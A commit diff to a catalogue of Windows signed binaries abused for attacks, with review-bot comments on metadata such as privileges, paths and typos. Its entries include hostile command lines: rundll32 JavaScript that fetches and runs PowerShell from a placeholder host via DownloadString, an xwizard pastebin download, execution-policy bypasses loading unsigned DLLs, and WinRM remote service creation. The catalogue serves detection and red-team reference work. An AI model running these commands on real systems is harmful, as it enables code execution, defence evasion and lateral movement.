Fixing various issues identified

This commit is contained in:
Wietze 2021-12-14 16:50:22 +00:00
parent adf171d089
commit 6793a7d238
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
17 changed files with 30 additions and 32 deletions

View File

@ -4,7 +4,7 @@ Description: Binary used to execute scripts in Windows
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: cscript c:\ads\file.txt:script.vbs
- Command: cscript //e:vbscript c:\ads\file.txt:script.vbs
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: ADS
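Review bot: The unchanged Description line still reads "exectute"; fix the typo while this file is being touched. The Description should also say why the //e:vbscript engine switch was added to the command (presumably because the script host cannot pick the engine when the stream lives in a .txt host file), otherwise a later editor may "simplify" it back to the bare stream path.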

View File

@ -19,8 +19,7 @@ Commands:
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe
- Path: C:\Windows\hh.exe
Code_Sample:
- Code:
Detection:
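Review bot: The hunk header (-19,8 +19,7) shows that one of the three Path entries (System32, SysWOW64, Windows root) is dropped, but the rendered view carries no +/- markers and the commit message "Fixing various issues identified" does not say which path was found to be wrong. Record which hh.exe location was verified absent, and on which Windows version, in the commit message or a follow-up comment so the Full_Path list can be audited later.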

View File

@ -8,7 +8,7 @@ Commands:
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
Usecase: Code execution
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
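Review bot: The Privileges bump from User to Admin is not explained anywhere in the change; add the reason (what in this INF-driven scrobj.dll execution actually requires elevation) to the commit message or the entry. The unchanged Description also has a grammar slip, "from a command in entered into a specially prepared INF file"; drop the stray "in".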

View File

@ -8,7 +8,7 @@ Commands:
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
Usecase: Proxy execution of .dll
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1546.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
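Review bot: The User-to-Admin change is consistent with the Description, which says the DLL is loaded "every time the netsh command is called" (a system-wide helper registration), but nothing on the page states that the registration point is machine-wide. Add a short note to the Usecase or Description saying where the helper is registered so the Admin requirement is self-explanatory.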

View File

@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
Description: Load DLL specified in target .RSP file. See the payloads folder for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures
Category: Execute
Privileges: User
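Review bot: Minor style point on the unchanged Usecase line: "defensive counter measures" is spelled "countermeasures" in the cscript entry in this same commit; pick one spelling for the corpus. The Description now points at "the payloads folder" by name only; a path relative to the repository root would make the reference unambiguous.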

View File

@ -19,8 +19,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\regedit.exe
- Path: C:\Windows\SysWOW64\regedit.exe
- Path: C:\Windows\regedit.exe
Code_Sample:
- Code:
Detection:
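Review bot: Same issue as the hh.exe hunk: -19,8 +19,7 means one regedit.exe Path entry was removed, but the rendered diff does not show which of System32, SysWOW64 or the Windows root it was, and the commit message gives no rationale. State which location was verified missing so reviewers can confirm it on a live system.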

View File

@ -8,19 +8,19 @@ Commands:
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: Execute
Privileges: Local Admin
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass
Privileges: Local Admin
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\regsvcs.exe
- Path: C:\Windows\SysWOW64\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
Code_Sample:
- Code:
Detection:
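Review bot: Privileges drop from "Local Admin" to "User" on both regsvcs.exe commands without any supporting note in the commit message; add the test result (Windows version, user context) that justified it. The two entries are otherwise identical (same Command, Description, Usecase, MitreID), differing only in Category (Execute vs AWL bypass); either collapse them or make the Descriptions distinct. The unchanged Full_Path lines also mix "C:\" and "c:\" drive casing.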

View File

@ -18,7 +18,7 @@ Commands:
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute

View File

@ -5,19 +5,19 @@ Author: Lior Adar
Created: 2020-02-27
Commands:
- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
Description: Binary file used by .NET to compile vb code to .exe
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
Description: Description of the second command
Usecase: A description of the usecase
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
OperatingSystem: Windows 7, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
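Review bot: The placeholder text is gone, but the second command now carries exactly the same Description and Usecase as the first, so the entry no longer says what the -reference:Microsoft.VisualBasic.dll form adds over the plain /target:exe invocation; give it a Description that explains the reference switch. The new OperatingSystem value "Windows 7, Windows 10, Windows 11" also omits Windows 8 and 8.1 while every other entry in this commit lists them; either confirm vbc.exe was not tested there or align the list.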

View File

@ -4,7 +4,7 @@ Description: Used by Windows to execute scripts
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: wscript c:\ads\file.txt:script.vbs
- Command: wscript //e:vbscript c:\ads\file.txt:script.vbs
Description: Execute script stored in an alternate data stream
Usecase: Execute hidden code to evade defensive counter measures
Category: ADS
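Review bot: Same change as the cscript entry; the Description "Execute script stored in an alternate data stream" should mention that the //e:vbscript switch is required for the stream form so the two entries stay in sync and the switch is not dropped later.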

View File

@ -19,7 +19,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
Usecase: Download file from Internet
Category: Download
Privileges: User
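Review bot: The new cache path in the Description mixes separators: "...\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" uses a backslash before the random directory and a forward slash before the file name, in both variants. Use backslashes throughout so the string can be pasted into a detection rule as-is. The placeholder conventions (<...> versus [1]) could also be explained in one short clause, since "[1]" is a literal part of the cached file name while the angle-bracket parts are variable.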

View File

@ -15,7 +15,7 @@ Commands:
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
Privileges: Admin
MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll
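Review bot: LaunchINFSection is moved to Admin while the neighbouring RegisterOCX command stays at User, and nothing in the change says why the INF path needs elevation. Add the reason to the commit message or the entry's Description, and note whether the Admin requirement applies to the local and remote script cases the Description mentions.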

View File

@ -10,35 +10,35 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows, Windows 11 (!!!)
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
Usecase: Run local or remote script(let) code through INF file specification.
Category: AWL Bypass
Privileges: User
Privileges: Admin
MitreID: T1218.011
OperatingSystem: Windows, Windows 11 (!!!)
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
Description: Launch a DLL payload by calling the RegisterOCX function.
Usecase: Load a DLL payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows, Windows 11 (!!!)
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
Description: Launch an executable by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows, Windows 11 (!!!)
OperatingSystem: Windows 10, Windows 11
- Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Description: Launch command line by calling the RegisterOCX function.
Usecase: Run an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows, Windows 11 (!!!)
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\ieadvpack.dll
- Path: c:\windows\syswow64\ieadvpack.dll
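Review bot: Replacing "Windows, Windows 11 (!!!)" with "Windows 10, Windows 11" is the right cleanup, but the same justification question applies here as in the advpack.dll hunk: the User-to-Admin change for LaunchINFSection is unexplained. Two consistency nits on the unchanged lines: "rundll32 ieadvpack.dll, RegisterOCX" has a space after the comma while the other commands do not, and the Full_Path entries use all-lowercase "c:\windows\system32" unlike the rest of the corpus.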

View File

@ -4,7 +4,7 @@ Description: Windows Shell Common Dll
Author:
Created: 2018-05-25
Commands:
- Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll
- Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll
Description: Launch a DLL payload by calling the Control_RunDLL function.
Usecase: Load a DLL payload.
Category: Execute
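Review bot: The unchanged "Author:" line in this file is empty; fill it in (or use the project's placeholder convention) while the entry is being edited. Making the payload path explicit (c:\path\to\payload.dll) is a good change since Control_RunDLL otherwise leaves it unclear whether a bare name is resolved.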

View File

@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
- Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
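Review bot: Adding "-ep bypass" and the missing closing double quote fixes the command, but the Description should say that the execution policy switch is needed because CL_LoadAssembly.ps1 is a script that import-module must be allowed to run. Also worth documenting: relative to C:\Windows\diagnostics\system\Audio, the argument "..\..\..\..\testing\fun.dll" resolves to C:\testing\fun.dll, so the reader knows where to stage the DLL.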

View File

@ -4,7 +4,7 @@ Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()'
- Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
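Review bot: Same remarks as for the CL_LoadAssembly entry: state why "-ep bypass" is required, and note that "..\..\..\..\temp\unsigned.dll" resolves to C:\temp\unsigned.dll from c:\windows\diagnostics\system\networking. The two entries now share an identical Description and Usecase; a sentence naming the function each script exposes (LoadAssemblyFromPath vs RegSnapin) would make them distinguishable in search.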

View File

@ -11,11 +11,11 @@ Commands:
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10, Windows 11
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
Usecase: Proxy execution
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1216
OperatingSystem: Windows 10, Windows 11
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
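Review bot: Replacing the literal "\n" with "&&" is correct since the StartService call only makes sense after Create succeeds. The Privileges change to Admin should say on which host: the Description calls this lateral movement over WinRM, so the elevation that matters is on the remote target named by -r:http://acmedc:5985. "acmedc" is a placeholder hostname and should be marked as such, and the example service name "Evil" will not survive contact with any real environment, which is fine for a corpus entry but worth a word in Usecase.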